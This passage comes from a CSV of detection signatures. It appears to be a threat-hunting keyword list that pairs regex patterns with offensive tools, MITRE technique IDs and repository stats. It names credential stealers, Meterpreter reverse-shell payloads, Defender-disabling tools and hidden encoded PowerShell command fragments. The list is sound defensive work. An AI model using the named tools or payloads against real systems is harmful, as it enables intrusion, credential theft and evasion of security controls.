and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5989","1241","2024-04-27T01:14:44Z","2015-05-30T06:09:52Z" "*willfindlay/bpf-keylogger*",".{0,1000}willfindlay\/bpf\-keylogger.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/willfindlay/bpf-keylogger","1","1","N/A","10","1","0","2","2020-01-13T20:17:02Z","2019-12-25T16:27:28Z" "*win_chrome_password_extractor.py*",".{0,1000}win_chrome_password_extractor\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*win_fake_malware.*",".{0,1000}win_fake_malware\..{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*win_keylogger.py*",".{0,1000}win_keylogger\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*win_rev_http.exe*",".{0,1000}win_rev_http\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*win_rev_https.exe*",".{0,1000}win_rev_https\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*win_rev_tcp.exe*",".{0,1000}win_rev_tcp\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*win_wlan_passwd_and_wanip_extractor.py*",".{0,1000}win_wlan_passwd_and_wanip_extractor\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*Win32.LaZagne*",".{0,1000}Win32\.LaZagne.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*'Win32_Backdoor'*",".{0,1000}\'Win32_Backdoor\'.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*win32_stage_boot_reverse_shell_revert.asm*",".{0,1000}win32_stage_boot_reverse_shell_revert\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*win32_stage_uploadexec.asm*",".{0,1000}win32_stage_uploadexec\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*win32_stage_winexec.asm*",".{0,1000}win32_stage_winexec\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Win32kLeaker.*",".{0,1000}Win32kLeaker\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Win64.Lazagne*",".{0,1000}Win64\.Lazagne.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*Win7Elevate.*",".{0,1000}Win7Elevate\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Win7ElevateDll.*",".{0,1000}Win7ElevateDll\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*WINAPI KaynLoader(*",".{0,1000}WINAPI\sKaynLoader\(.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*WinBruteLogon* -v -u*",".{0,1000}WinBruteLogon.{0,1000}\s\-v\s\-u.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*WinBruteLogon.dpr*",".{0,1000}WinBruteLogon\.dpr.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*WinBruteLogon.dproj*",".{0,1000}WinBruteLogon\.dproj.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential 
Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*WinBruteLogon.exe*",".{0,1000}WinBruteLogon\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*WinBruteLogon.exe*",".{0,1000}WinBruteLogon\.exe.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*WinBruteLogon.res*",".{0,1000}WinBruteLogon\.res.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*WinCreds.exe*",".{0,1000}WinCreds\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*windapsearch --dc *",".{0,1000}windapsearch\s\-\-dc\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*windapsearch.py*",".{0,1000}windapsearch\.py.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","AD Enumeration","7","8","726","142","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "*windapsearch_enum*",".{0,1000}windapsearch_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*windapsearch_py2.py*",".{0,1000}windapsearch_py2\.py.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","AD Enumeration","7","8","726","142","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "*windapsearch-master*",".{0,1000}windapsearch\-master.{0,1000}","offensive_tool_keyword","windapsearch","Python 
script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","AD Enumeration","7","8","726","142","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "*WinDefenderKiller*",".{0,1000}WinDefenderKiller.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","385","56","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "*winDefKiller.exe*",".{0,1000}winDefKiller\.exe.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","385","56","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "*WindfarmDynamite.cdproj*",".{0,1000}WindfarmDynamite\.cdproj.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*WindfarmDynamite.exe*",".{0,1000}WindfarmDynamite\.exe.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). 
Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*WindfarmDynamite.sln*",".{0,1000}WindfarmDynamite\.sln.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*Windows Bind TCP ShellCode - BOF*",".{0,1000}Windows\sBind\sTCP\sShellCode\s\-\sBOF.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*'Windows Defender has blocked some of our Features.Please Turn off Windows Defender and run again*",".{0,1000}\'Windows\sDefender\shas\sblocked\ssome\sof\sour\sFeatures\.Please\sTurn\soff\sWindows\sDefender\sand\srun\sagain.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*Windows Exploit*",".{0,1000}Windows\sExploit.{0,1000}","offensive_tool_keyword","_","windows exploit keyword often used in poc exploit github 
repo or could be a file name or folder","T1068 - T1070 - T1071 - T1078 - T1085 - T1090 - T1105 - T1112 - T1134 - T1135 - T1136 - T1203 - T1210 - T1211 - T1218 - T1222 - T1247 - T1499 - T1505 - T1526 - T1547 - T1548 - T1550 - T1553 - T1574 - T1583 - T1584 - T1587 - T1588 - T1590 - T1591 - T1592 - T1596 - T1600","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*windows go build -o proxy.exe cmd/proxy/main.go*",".{0,1000}windows\sgo\sbuild\s\-o\sproxy\.exe\scmd\/proxy\/main\.go.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*-WindowS Hidden -ep Bypass -enc $b64FileServerMonitoringScript*",".{0,1000}\-WindowS\sHidden\s\-ep\sBypass\s\-enc\s\$b64FileServerMonitoringScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*-WindowS Hidden -ep Bypass -enc $b64monitoringScript*",".{0,1000}\-WindowS\sHidden\s\-ep\sBypass\s\-enc\s\$b64monitoringScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Windows Meterpreter Staged Reverse TCP 
(x64*",".{0,1000}Windows\sMeterpreter\sStaged\sReverse\sTCP\s\(x64.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Windows Meterpreter Stageless Reverse TCP (x64)*",".{0,1000}Windows\sMeterpreter\sStageless\sReverse\sTCP\s\(x64\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Windows Staged JSP Reverse TCP*",".{0,1000}Windows\sStaged\sJSP\sReverse\sTCP.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Windows Staged Reverse TCP (x64)*",".{0,1000}Windows\sStaged\sReverse\sTCP\s\(x64\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Windows Stageless Reverse TCP (x64)*",".{0,1000}Windows\sStageless\sReverse\sTCP\s\(x64\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*windows*lsa_secrets.py*",".{0,1000}windows.{0,1000}lsa_secrets\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an 
open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*windows/c_payload_util*",".{0,1000}windows\/c_payload_util.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*windows/gather/cachedump*",".{0,1000}windows\/gather\/cachedump.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*windows/gather/hashdump*",".{0,1000}windows\/gather\/hashdump.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*Windows/lazagne.spec*",".{0,1000}Windows\/lazagne\.spec.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*windows/meterpreter/reverse_https*",".{0,1000}windows\/meterpreter\/reverse_https.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*windows/samdump.go*",".{0,1000}windows\/samdump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*windows/shell_reverse_tcp*",".{0,1000}windows\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Windows/System32/cmdlol.exe*",".{0,1000}Windows\/System32\/cmdlol\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*windows/x64/meterpreter/reverse_tcp*",".{0,1000}windows\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","10","7","N/A","N/A","N/A","N/A" "*windows/x64/meterpreter/reverse_tcp*",".{0,1000}windows\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation 